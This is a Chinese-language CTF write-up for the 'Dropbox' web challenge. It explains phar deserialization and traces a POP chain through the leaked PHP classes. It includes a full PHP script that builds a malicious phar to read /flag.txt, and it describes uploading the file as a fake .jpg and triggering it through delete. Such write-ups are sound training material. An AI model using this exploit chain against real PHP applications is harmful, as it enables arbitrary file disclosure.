[CISCN2019 华北赛区 Day1 Web1]Dropbox
一、知识点:信息搜集,Phar反序列化
- phar知识点分析
phar文件的结构主要分为四个部分:
- 1.stub
phar文件的表示,类似于gif文件的GIF89a,以 xxx<?php xxx;__HALT__COMPILER();?>为固定形式,前面内容可以变,点必须以__HALT__COMPILER();?>结尾。
- 2.a mainfest describing the contents
该部分是phar文件中被压缩的文件的一些信息,其中meta-data部分的信息会被序列化,即执行serialize()函数,而phar://就相当于对这部分的内容进行反序列化,此处也正是漏洞点所在。
- 3.the file contents
这部分存储的是文件的内容,在没有其它特殊要求的情况下,这里面的内容不做约束。
- 4.a signature for verifying Phar integrity
数字签名。放在最末。
- 使用前提条件
1、phar文件可上传
2、文件流操作函数如file_get_content()等要有可利用的魔法方法。
3、文件流参数可控,且phar://协议可用。
二、解题
首先信息收集发现在注册登录上传文件后可以进行任意文件下载:
抓包:
进行文件下载:
读取到文件信息;
class.php
<?php
error_reporting(0);
$dbaddr = "127.0.0.1";
$dbuser = "root";
$dbpass = "root";
$dbname = "dropbox";
$db = new mysqli($dbaddr, $dbuser, $dbpass, $dbname);
class User {
public $db;
public function __construct() {
global $db;
$this->db = $db;
}
public function user_exist($username) {
$stmt = $this->db->prepare("SELECT `username` FROM `users` WHERE `username` = ? LIMIT 1;");
$stmt->bind_param("s", $username);
$stmt->execute();
$stmt->store_result();
$count = $stmt->num_rows;
if ($count === 0) {
return false;
}
return true;
}
public function add_user($username, $password) {
if ($this->user_exist($username)) {
return false;
}
$password = sha1($password . "SiAchGHmFx");
$stmt = $this->db->prepare("INSERT INTO `users` (`id`, `username`, `password`) VALUES (NULL, ?, ?);");
$stmt->bind_param("ss", $username, $password);
$stmt->execute();
return true;
}
public function verify_user($username, $password) {
if (!$this->user_exist($username)) {
return false;
}
$password = sha1($password . "SiAchGHmFx");
$stmt = $this->db->prepare("SELECT `password` FROM `users` WHERE `username` = ?;");
$stmt->bind_param("s", $username);
$stmt->execute();
$stmt->bind_result($expect);
$stmt->fetch();
if (isset($expect) && $expect === $password) {
return true;
}
return false;
}
public function __destruct() {
$this->db->close();
}
}
class FileList {
private $files;
private $results;
private $funcs;
public function __construct($path) {
$this->files = array();
$this->results = array();
$this->funcs = array();
$filenames = scandir($path);
$key = array_search(".", $filenames);
unset($filenames[$key]);
$key = array_search("..", $filenames);
unset($filenames[$key]);
foreach ($filenames as $filename) {
$file = new File();
$file->open($path . $filename);
array_push($this->files, $file);
$this->results[$file->name()] = array();
}
}
public function __call($func, $args) {
array_push($this->funcs, $func);
foreach ($this->files as $file) {
$this->results[$file->name()][$func] = $file->$func();
}
}
public function __destruct() {
$table = '<div id="container" class="container"><div class="table-responsive"><table id="table" class="table table-bordered table-hover sm-font">';
$table .= '<thead><tr>';
foreach ($this->funcs as $func) {
$table .= '<th scope="col" class="text-center">' . htmlentities($func) . '</th>';
}
$table .= '<th scope="col" class="text-center">Opt</th>';
$table .= '</thead><tbody>';
foreach ($this->results as $filename => $result) {
$table .= '<tr>';
foreach ($result as $func => $value) {
$table .= '<td class="text-center">' . htmlentities($value) . '</td>';
}
$table .= '<td class="text-center" filename="' . htmlentities($filename) . '"><a href="#" class="download">下载</a> / <a href="#" class="delete">åˆ é™¤</a></td>';
$table .= '</tr>';
}
echo $table;
}
}
class File {
public $filename;
public function open($filename) {
$this->filename = $filename;
if (file_exists($filename) && !is_dir($filename)) {
return true;
} else {
return false;
}
}
public function name() {
return basename($this->filename);
}
public function size() {
$size = filesize($this->filename);
$units = array(' B', ' KB', ' MB', ' GB', ' TB');
for ($i = 0; $size >= 1024 && $i < 4; $i++) $size /= 1024;
return round($size, 2).$units[$i];
}
public function detele() {
unlink($this->filename);
}
public function close() {
return file_get_contents($this->filename);
}
}
?>
进行代代码审计发现存在file_get_contents()函数,可以构造pop链来利用。首先在User类中的__desturcut(),调用了close()方法,可以利用这点来调用File类的close()方法。但没有回显,但在FileList类处有__destruct()方法能进行回显,可以利用FileList类的__call()进行遍历files数组,并且对每一个变量执行一次$func函数,然后将结果存进$result中,调用File类的close()方法。
所以思路是:
User->destruct()=>FileList->call()=>File->close()=>FileList->__destruct()
然后触发点是在:
- delete.php:
<?php session_start(); if (!isset($_SESSION['login'])) { header("Location: login.php"); die(); } if (!isset($_POST['filename'])) { die(); } include "class.php"; chdir($_SESSION['sandbox']); $file = new File(); $filename = (string) $_POST['filename']; if (strlen($filename) < 40 && $file->open($filename)) { $file->detele(); Header("Content-type: application/json"); $response = array("success" => true, "error" => ""); echo json_encode($response); } else { Header("Content-type: application/json"); $response = array("success" => false, "error" => "File not exist"); echo json_encode($response); } ?>
在new File()的类中调用了detele函数:
发现detele函数有unlink函数,可以触发pop链
编写代码生成phar文件:
<?php class User { public $db; } class File { public $filename; } class FileList { private $files; private $results; private $funcs; public function __construct() { $file = new File(); $file->filename = '/flag.txt'; $this->files = array($file); $this->results = array(); $this->funcs = array(); } } @unlink("phar.phar");#删除phar.phar $phar = new Phar("phar.phar"); //后缀名必须为phar $phar->startBuffering();#提高性能,好像不必要 $phar->setStub("<?php __HALT_COMPILER(); ?>"); //设置stub $o = new User(); $o->db = new FileList(); $phar->setMetadata($o); //将自定义的meta-data存入manifest $phar->addFromString("test.txt", "test"); //添加要压缩的文件 //签名自动计算 $phar->stopBuffering(); ?>
(注意:想要生成phar文件记得把php.ini中的phar.readonly选项设置为Off,否则将无法生成phar文件)
运行脚本生成文件phar.php
重命名为jpg格式上传文件抓包修改Content-Type为image/jpeg或其它图片格式:
利用删除触发:
参考博客:
https://blog.csdn.net/SHININGENDING/article/details/124368489